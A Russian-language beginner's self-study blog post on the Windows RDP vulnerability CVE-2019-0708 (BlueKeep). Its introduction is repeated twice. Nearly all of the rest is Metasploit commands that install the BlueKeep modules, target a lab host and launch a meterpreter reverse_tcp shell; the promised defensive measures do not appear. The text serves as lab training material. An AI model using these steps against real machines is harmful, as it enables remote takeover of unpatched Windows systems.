
Эта статья расскажет об уязвимости службы удалённого рабочего стола Windows (CVE-2019-0708) и подробно опишет данный баг и меры защиты. Автор, новичок в кибербезопасности, делится с вами базовыми учебными пособиями по самоподготовке — в основном онлайн-заметками о инструментах безопасности и практических действиях. Надеюсь, они вам понравятся. Также очень хочется, чтобы вы вместе со мной выполняли задания и прогрессировали; в дальнейшем мы углублённо изучим вопросы безопасности сетей и систем и поделимся соответствующими экспериментами. В общем, надеюсь, что эта серия статей будет полезна друзьям-блогерам. Писать статьи непросто, гуру, пожалуйста, не ругайтесь, если что не так, спасибо!
В этой статье будет рассмотрена уязвимость службы удаленного рабочего стола Windows (CVE-2019-0708), а также подробно объяснены сама уязвимость и меры защиты. Автор, будучи новичком в области кибербезопасности, делится с вами некоторыми базовыми уроками для самостоятельного изучения, в основном это онлайн-заметки об инструментах безопасности и практических операциях. Надеюсь, они вам понравятся. Кроме того, я надеюсь, что вы сможете вместе со мной выполнять эти действия и прогрессировать. В дальнейшем я буду углубленно изучать знания о кибербезопасности и системной безопасности и делиться соответствующими экспериментами. В общем, надеюсь, что эта серия статей будет полезна читателям. Написание статей дается нелегко, прошу гуру не критиковать, если что-то не так, спасибо!
Соответствующие блоги:
[Серия самообучения кибербезопасности] 58. Повторное изучение CVE-2019-0708 в Windows Exploitation и обратный шелл с помощью Metasploit
[Серия самообучения кибербезопасности] 44. Воспроизведение и подробное объяснение уязвимости службы удаленного рабочего стола Windows (CVE-2019-0708)
Основные команды:
# Копирование файлов
cp ./rdp/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
# Запуск инструмента
msfconsole
reload_all
search 0708
# Использование скрипта
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# Просмотр информации
show options
show targets
info
# Установка адреса прослушивания, целевого адреса, полезной нагрузки, типа цели
set rhosts 192.168.44.132
set lhost 192.168.44.129
set rdp_client_ip 192.168.44.129
set payload windows/x64/meterpreter/reverse_tcp
unset RDP_CLIENT_NAME
set target 3
# Запуск скрипта
run
exploit
# Установка пропускной способности
Set GROOMSIZE 40